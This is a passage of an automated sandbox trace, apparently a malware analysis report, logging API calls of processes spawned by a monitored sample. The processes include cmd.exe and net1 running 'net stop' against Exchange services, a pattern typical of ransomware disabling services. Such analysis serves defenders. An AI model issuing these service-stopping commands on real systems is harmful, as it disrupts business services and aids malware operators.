_String2="NETLOGON") returned -1 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="NETPOPUP") returned -1 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="NETPOPUP") returned -1 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="SQLSERVER") returned -6 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="SQLSERVER") returned -6 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="REPLICATOR") returned -5 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="REPLICATOR") returned -5 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="REMOTEBOOT") returned -5 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="REMOTEBOOT") returned -5 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="TIMESOURCE") returned -7 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="TIMESOURCE") returned -7 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="AFP") returned 12 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="AFP") returned 12 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="UPS") returned -8 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="UPS") returned -8 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="XACTSRV") returned -11 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="XACTSRV") returned -11 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="TCPIP") returned -7 [0138.712] _wcsicmp (_String1="MSEXCHANGEPOP3", _String2="TCPIP") returned -7 [0138.712] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5103758 [0138.712] OpenServiceW (hSCManager=0x5103758, lpServiceName="MSEXCHANGEPOP3", dwDesiredAccess=0x84) returned 0x0 [0138.712] GetLastError () returned 0x424 [0138.712] CloseServiceHandle (hSCObject=0x5103758) returned 1 [0138.712] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0138.712] LoadLibraryW (lpLibFileName="NETMSG") returned 0x1030000 [0138.713] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x1030000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0138.714] GetFileType (hFile=0x40) returned 0x2 [0138.714] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf3fae0 | out: lpMode=0xf3fae0) returned 1 [0138.714] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xf3faec, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xf3faec*=0x1e) returned 1 [0138.715] GetFileType (hFile=0x40) returned 0x2 [0138.715] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf3fae0 | out: lpMode=0xf3fae0) returned 1 [0138.715] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf3faec, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xf3faec*=0x2) returned 1 [0138.715] _ultow (in: _Dest=0x889, _Radix=15989504 | out: _Dest=0x889) returned="2185" [0138.715] FormatMessageW (in: dwFlags=0x2800, lpSource=0x1030000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0138.715] GetFileType (hFile=0x40) returned 0x2 [0138.715] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf3fad0 | out: lpMode=0xf3fad0) returned 1 [0138.715] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xf3fadc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0xf3fadc*=0x34) returned 1 [0138.715] GetFileType (hFile=0x40) returned 0x2 [0138.715] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0xf3fad0 | out: lpMode=0xf3fad0) returned 1 [0138.716] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xf3fadc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0xf3fadc*=0x2) returned 1 [0138.716] NetApiBufferFree (Buffer=0x5107fe0) returned 0x0 [0138.716] NetApiBufferFree (Buffer=0x5107f68) returned 0x0 [0138.716] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangePop3" [0138.716] exit (_Code=2) Thread: id = 694 os_tid = 0xc18 Process: id = "233" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x141a2000" os_pid = "0x9ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeProtectedServiceHost" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11340 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 11341 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 11342 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 11343 start_va = 0x4410000 end_va = 0x442ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 11344 start_va = 0x4430000 end_va = 0x4443fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004430000" filename = "" Region: id = 11345 start_va = 0x4450000 end_va = 0x448ffff entry_point = 0x0 region_type = private name = "private_0x0000000004450000" filename = "" Region: id = 11346 start_va = 0x4490000 end_va = 0x458ffff entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 11347 start_va = 0x4590000 end_va = 0x4593fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004590000" filename = "" Region: id = 11348 start_va = 0x45a0000 end_va = 0x45a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 11349 start_va = 0x45b0000 end_va = 0x45b1fff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 11350 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11351 start_va = 0x7eaf0000 end_va = 0x7eb12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaf0000" filename = "" Region: id = 11352 start_va = 0x7eb18000 end_va = 0x7eb1afff entry_point = 0x0 region_type = private name = "private_0x000000007eb18000" filename = "" Region: id = 11353 start_va = 0x7eb1b000 end_va = 0x7eb1bfff entry_point = 0x0 region_type = private name = "private_0x000000007eb1b000" filename = "" Region: id = 11354 start_va = 0x7eb1e000 end_va = 0x7eb1efff entry_point = 0x0 region_type = private name = "private_0x000000007eb1e000" filename = "" Region: id = 11355 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11356 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11357 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11358 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11359 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11360 start_va = 0x4790000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 11361 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11362 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11363 start_va = 0x4900000 end_va = 0x49fffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 11364 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11405 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 11406 start_va = 0x45c0000 end_va = 0x467dfff entry_point = 0x45c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11407 start_va = 0x4680000 end_va = 0x46bffff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 11408 start_va = 0x47a0000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 11409 start_va = 0x4af0000 end_va = 0x4afffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 11410 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11411 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11412 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11413 start_va = 0x7e9f0000 end_va = 0x7eaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9f0000" filename = "" Region: id = 11414 start_va = 0x7eb15000 end_va = 0x7eb17fff entry_point = 0x0 region_type = private name = "private_0x000000007eb15000" filename = "" Region: id = 11415 start_va = 0x4410000 end_va = 0x4413fff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 11416 start_va = 0x4420000 end_va = 0x4423fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 11417 start_va = 0x4b00000 end_va = 0x4e36fff entry_point = 0x4b00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 695 os_tid = 0xfc4 [0138.880] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0138.880] __set_app_type (_Type=0x1) [0138.880] __p__fmode () returned 0x77ac4d6c [0138.880] __p__commode () returned 0x77ac5b1c [0138.880] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0138.880] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0138.880] GetCurrentThreadId () returned 0xfc4 [0138.880] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfc4) returned 0x84 [0138.880] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0138.880] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0138.880] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.882] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x458f9bc | out: phkResult=0x458f9bc*=0x0) returned 0x2 [0138.883] VirtualQuery (in: lpAddress=0x458f9c3, lpBuffer=0x458f974, dwLength=0x1c | out: lpBuffer=0x458f974*(BaseAddress=0x458f000, AllocationBase=0x4490000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.883] VirtualQuery (in: lpAddress=0x4490000, lpBuffer=0x458f974, dwLength=0x1c | out: lpBuffer=0x458f974*(BaseAddress=0x4490000, AllocationBase=0x4490000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0138.883] VirtualQuery (in: lpAddress=0x4491000, lpBuffer=0x458f974, dwLength=0x1c | out: lpBuffer=0x458f974*(BaseAddress=0x4491000, AllocationBase=0x4490000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0138.883] VirtualQuery (in: lpAddress=0x4493000, lpBuffer=0x458f974, dwLength=0x1c | out: lpBuffer=0x458f974*(BaseAddress=0x4493000, AllocationBase=0x4490000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.883] VirtualQuery (in: lpAddress=0x4590000, lpBuffer=0x458f974, dwLength=0x1c | out: lpBuffer=0x458f974*(BaseAddress=0x4590000, AllocationBase=0x4590000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0138.883] GetConsoleOutputCP () returned 0x1b5 [0138.883] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.883] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0138.883] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.883] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0138.883] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.883] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0138.884] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.884] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0138.884] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.884] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0138.884] _get_osfhandle (_FileHandle=0) returned 0x38 [0138.884] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0138.884] GetEnvironmentStringsW () returned 0x4907d98* [0138.884] FreeEnvironmentStringsA (penv="A") returned 1 [0138.884] GetEnvironmentStringsW () returned 0x4907d98* [0138.884] FreeEnvironmentStringsA (penv="A") returned 1 [0138.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x458e920 | out: phkResult=0x458e920*=0x94) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x0, lpData=0x458e92c*=0x68, lpcbData=0x458e928*=0x1000) returned 0x2 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x1, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x0, lpData=0x458e92c*=0x1, lpcbData=0x458e928*=0x1000) returned 0x2 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x0, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x40, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x40, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x0, lpData=0x458e92c*=0x40, lpcbData=0x458e928*=0x1000) returned 0x2 [0138.885] RegCloseKey (hKey=0x94) returned 0x0 [0138.885] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x458e920 | out: phkResult=0x458e920*=0x94) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x0, lpData=0x458e92c*=0x40, lpcbData=0x458e928*=0x1000) returned 0x2 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x1, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x0, lpData=0x458e92c*=0x1, lpcbData=0x458e928*=0x1000) returned 0x2 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x0, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x9, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x4, lpData=0x458e92c*=0x9, lpcbData=0x458e928*=0x4) returned 0x0 [0138.885] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x458e924, lpData=0x458e92c, lpcbData=0x458e928*=0x1000 | out: lpType=0x458e924*=0x0, lpData=0x458e92c*=0x9, lpcbData=0x458e928*=0x1000) returned 0x2 [0138.885] RegCloseKey (hKey=0x94) returned 0x0 [0138.885] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983b [0138.885] srand (_Seed=0x5ad2983b) [0138.885] GetCommandLineW () returned="/c net stop MSExchangeProtectedServiceHost" [0138.885] GetCommandLineW () returned="/c net stop MSExchangeProtectedServiceHost" [0138.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.885] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4909cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0138.885] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0138.885] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.885] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0138.885] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0138.885] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0138.885] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0138.885] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0138.885] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0138.885] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0138.885] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0138.886] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0138.886] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0138.886] GetEnvironmentStringsW () returned 0x4907d98* [0138.886] FreeEnvironmentStringsA (penv="A") returned 1 [0138.886] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.886] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0138.886] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0138.886] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0138.886] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0138.886] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0138.886] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0138.886] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0138.886] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0138.886] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0138.886] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x458f6f8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.886] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x458f6f8, lpFilePart=0x458f6f0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x458f6f0*="Desktop") returned 0x1d [0138.886] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0138.886] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x458f478 | out: lpFindFileData=0x458f478) returned 0x49005c8 [0138.886] FindClose (in: hFindFile=0x49005c8 | out: hFindFile=0x49005c8) returned 1 [0138.887] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x458f478 | out: lpFindFileData=0x458f478) returned 0x49005c8 [0138.887] FindClose (in: hFindFile=0x49005c8 | out: hFindFile=0x49005c8) returned 1 [0138.887] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0138.887] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x458f478 | out: lpFindFileData=0x458f478) returned 0x49005c8 [0138.887] FindClose (in: hFindFile=0x49005c8 | out: hFindFile=0x49005c8) returned 1 [0138.887] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0138.887] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0138.887] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0138.887] GetEnvironmentStringsW () returned 0x4907d98* [0138.887] FreeEnvironmentStringsA (penv="=") returned 1 [0138.887] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0138.887] GetConsoleOutputCP () returned 0x1b5 [0138.888] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0138.888] GetUserDefaultLCID () returned 0x409 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x458f828, cchData=128 | out: lpLCData="0") returned 2 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x458f828, cchData=128 | out: lpLCData="0") returned 2 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x458f828, cchData=128 | out: lpLCData="1") returned 2 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0138.888] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0138.888] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0138.889] GetConsoleTitleW (in: lpConsoleTitle=0x490aa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0138.889] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0138.889] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0138.890] GetProcAddress (hModule=0x77670000, 